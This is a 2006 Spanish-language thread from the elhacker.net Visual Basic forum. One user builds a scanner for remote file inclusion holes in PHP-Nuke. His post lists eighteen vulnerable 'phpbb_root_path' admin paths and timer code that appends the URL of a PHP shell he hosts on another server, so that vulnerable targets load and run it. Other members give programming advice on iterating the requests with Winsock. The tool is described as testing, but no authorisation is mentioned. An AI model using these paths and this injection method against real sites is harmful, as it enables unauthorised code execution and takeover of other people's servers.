elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Arrays
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Arrays  (Leído 4,085 veces)
xDie


Desconectado Desconectado

Mensajes: 326


lol


Ver Perfil
Arrays
« en: 18 Septiembre 2006, 01:11 am »

Hola estoy haciendo un programa para probar si una web es vulnerable a rfi, tengo una lsita de las variables atacadas en php nuke, entonces lo que hago es una arreglo asi:
Código:
Dim VarBug(17) As String
VarBug(0) = "/modules/Forums/admin/index.php?phpbb_root_path="
VarBug(1) = "/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path="
VarBug(2) = "/modules/Forums/admin/admin_board.php?phpbb_root_path="
VarBug(3) = "/modules/Forums/admin/admin_disallow.php?phpbb_root_path="
VarBug(4) = "/modules/Forums/admin/admin_forumauth.php?phpbb_root_path="
VarBug(5) = "/modules/Forums/admin/admin_groups.php?phpbb_root_path="
VarBug(6) = "/modules/Forums/admin/admin_ranks.php?phpbb_root_path="
VarBug(7) = "/modules/Forums/admin/admin_styles.php?phpbb_root_path="
VarBug(8) = "/modules/Forums/admin/admin_user_ban.php?phpbb_root_path="
VarBug(9) = "/modules/Forums/admin/admin_words.php?phpbb_root_path="
VarBug(10) = "/modules/Forums/admin/admin_avatar.php?phpbb_root_path="
VarBug(11) = "/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path="
VarBug(12) = "/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path="
VarBug(13) = "/modules/Forums/admin/admin_forums.php?phpbb_root_path="
VarBug(14) = "/modules/Forums/admin/admin_mass_email.php?phpbb_root_path="
VarBug(15) = "/modules/Forums/admin/admin_smilies.php?phpbb_root_path="
VarBug(16) = "/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path="
VarBug(17) = "/modules/Forums/admin/admin_users.php?phpbb_root_path="


Ahora como hago para que me valla probando de a una, porque el bucle for es rapidismo no leda tiempo de carga ni nada.. no se y hacerla en un timer me parece boludo... como podria? gracias


En línea

Licence to kill!
Mr.Chispa

Desconectado Desconectado

Mensajes: 269



Ver Perfil
Re: Arrays
« Respuesta #1 en: 18 Septiembre 2006, 01:17 am »

lo q podes hacer es poner una variable de control, q intente con la primera y cuando termine le sumas 1 a la variable d control y probas con el siguiente, si lo tas haciedno con el winsock le podes decir q le sume 1 cuando cierra la conexion y q intente denuevo


En línea

MANULOMM


Desconectado Desconectado

Mensajes: 559


Erepublik.com


Ver Perfil
Re: Arrays
« Respuesta #2 en: 18 Septiembre 2006, 04:34 am »

otra opcion es colocar la instruccion sleep(1000) para que se espere un tiempo, lo de 1000 es equivalente a un segundo, ya vos lo cuadras....
para mi seria mas o menos asi:

Código:
For I = 1 to 17 
    VarBug(i)
    sleep(1000)
next
O halgo parecido!!!

Atentamente


JUAN MANUEL LOMBANA
MEDELLÍN - COLOMBIA
En línea


xDie


Desconectado Desconectado

Mensajes: 326


lol


Ver Perfil
Re: Arrays
« Respuesta #3 en: 18 Septiembre 2006, 20:48 pm »

Es en un webform, no nfuncioan con el sleep, nvoy a intentar ingeniarme para sumarle un valor mas dentro de un tiemer, salu2
En línea

Licence to kill!
byebye


Desconectado Desconectado

Mensajes: 5.093



Ver Perfil
Re: Arrays
« Respuesta #4 en: 18 Septiembre 2006, 21:02 pm »

si estas usando el control winsock pues lo mismo, un array y conectas todos (o los que te permita el servidor) a la vez y esperas la respuesta si es vulnerable pues lo muestras y continuas con el siguiente elemento del array, si no es vulnerable pues continuas con el otro y asi con todos los elementos.
En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.164


Cheats y Trainers para todos!


Ver Perfil WWW
Re: Arrays
« Respuesta #5 en: 19 Septiembre 2006, 00:24 am »

Lo que tienes que hacer es jugar con los eventos de MSWinsock. En el evento OnConnect pones algo así:

Código:
    Winsock1(Index).SendData "GET /index.php HTTP/1.1" & vbCrLf
    Winsock1(Index).SendData "Host: www.google.com" & vbCrLf
    Winsock1(Index).SendData "From: 0.0.0.0" & vbCrLf
    Winsock1(Index).SendData "User-Agent: Pruebas/1.0" & vbCrLf & vbCrLf

Solo tienes que ir variando la petición GET por un valor del array, primero empiezas por el 1, cuando el servidor responda miras los datos en DataArrival, si es positivo mandas un mensaje y llamas a la funcion ws.senddata (la de arriba) con un valor incrementado del array, asi hasta el valor 17.

No necesitas ni timers ni bucles ;)
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
xDie


Desconectado Desconectado

Mensajes: 326


lol


Ver Perfil
Re: Arrays
« Respuesta #6 en: 19 Septiembre 2006, 00:25 am »

Lo hago con un web form asi,
Código:
Private Sub Timer1_Timer()

If i < 53 Then
i = i + 1
Else
MsgBox "Ya termino el test, si vistes una shell en php, es porque es vulnerable", vbInformation + vbOKOnly, "Rfi to php nuke"
Timer1.Enabled = False
i = 0

End If

Wb.Navigate (txtUrl.Text & VarBug(i) & txtshell.Text)
barra.Value = i


End Sub
Osea el usuario va tener que ver un pantallaso de una shell, no se como buscar una paabra dentro del webbrowser osea dentro del documento.. alguien me peude ayudar???
En línea

Licence to kill!
xDie


Desconectado Desconectado

Mensajes: 326


lol


Ver Perfil
Re: Arrays
« Respuesta #7 en: 19 Septiembre 2006, 00:30 am »

Lo que tienes que hacer es jugar con los eventos de MSWinsock. En el evento OnConnect pones algo así:

Código:
    Winsock1(Index).SendData "GET /index.php HTTP/1.1" & vbCrLf
    Winsock1(Index).SendData "Host: www.google.com" & vbCrLf
    Winsock1(Index).SendData "From: 0.0.0.0" & vbCrLf
    Winsock1(Index).SendData "User-Agent: Pruebas/1.0" & vbCrLf & vbCrLf

Solo tienes que ir variando la petición GET por un valor del array, primero empiezas por el 1, cuando el servidor responda miras los datos en DataArrival, si es positivo mandas un mensaje y llamas a la funcion ws.senddata (la de arriba) con un valor incrementado del array, asi hasta el valor 17.

No necesitas ni timers ni bucles ;)

Mad no te entendido muy bien, osea no se coo hacerlo con winsock, yo suaba el control de internet pàra hacer peticones get desde el navegador mismo, ya que tengo una shell en otro server y lo que hago es sumarle el host, el directorio y el archivo donde se encuentra el bug y la shell. Gracias pro contestar
En línea

Licence to kill!
Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.164


Cheats y Trainers para todos!


Ver Perfil WWW
Re: Arrays
« Respuesta #8 en: 19 Septiembre 2006, 00:43 am »

uf, usando el control de explorador de internet es distinto. Con Winsock te funcionaría mejor, ademas puedes evaluar la respuesta del servidor através del codigo de 3 digitos que devuelve el protocolo HTTP.

Pero si no sabes usarlo entonces no te compliques la vida. La mejor solución sería con winsock, pero si no puedes o no sabes usarlo entonces no se que otro método te queda. :(

Yo por mi parte he creado este mismo proyecto tuyo pero con otros datos y para otros fines, si tengo tiempo comento el código y lo hago público. Saludos !!!
« Última modificación: 19 Septiembre 2006, 00:44 am por ||MadAntrax|| » En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
xDie


Desconectado Desconectado

Mensajes: 326


lol


Ver Perfil
Re: Arrays
« Respuesta #9 en: 20 Septiembre 2006, 02:34 am »

uf, usando el control de explorador de internet es distinto. Con Winsock te funcionaría mejor, ademas puedes evaluar la respuesta del servidor através del codigo de 3 digitos que devuelve el protocolo HTTP.

Pero si no sabes usarlo entonces no te compliques la vida. La mejor solución sería con winsock, pero si no puedes o no sabes usarlo entonces no se que otro método te queda. :(

Yo por mi parte he creado este mismo proyecto tuyo pero con otros datos y para otros fines, si tengo tiempo comento el código y lo hago público. Saludos !!!
Robando la idea y no explicas como se hace.. gracias igual
En línea

Licence to kill!
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
No entiendo los arrays
PHP
Riki_89D 7 3,456 Último mensaje 1 Diciembre 2010, 22:29 pm
por Shell Root
problemas con Arrays PHP
PHP
Dreamcacher 7 4,157 Último mensaje 9 Diciembre 2010, 10:16 am
por Dreamcacher
Arrays de estrocturas
Programación C/C++
Gotttlieb 3 3,254 Último mensaje 26 Abril 2011, 18:38 pm
por El_Java
Arrays de PHP
Desarrollo Web
inquilin@19 2 1,948 Último mensaje 10 Octubre 2011, 17:23 pm
por inquilin@19
Punteros y arrays
Programación C/C++
cazagavilan 4 2,320 Último mensaje 14 Abril 2012, 19:32 pm
por cazagavilan
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines